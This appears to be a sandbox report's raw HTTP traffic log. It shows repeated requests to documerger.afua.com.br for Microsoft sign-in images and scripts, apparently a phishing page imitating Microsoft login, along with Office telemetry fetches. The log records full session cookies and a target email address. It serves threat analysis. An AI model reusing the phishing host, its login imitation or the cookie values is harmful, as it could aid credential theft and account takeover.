buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; brcap=0
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
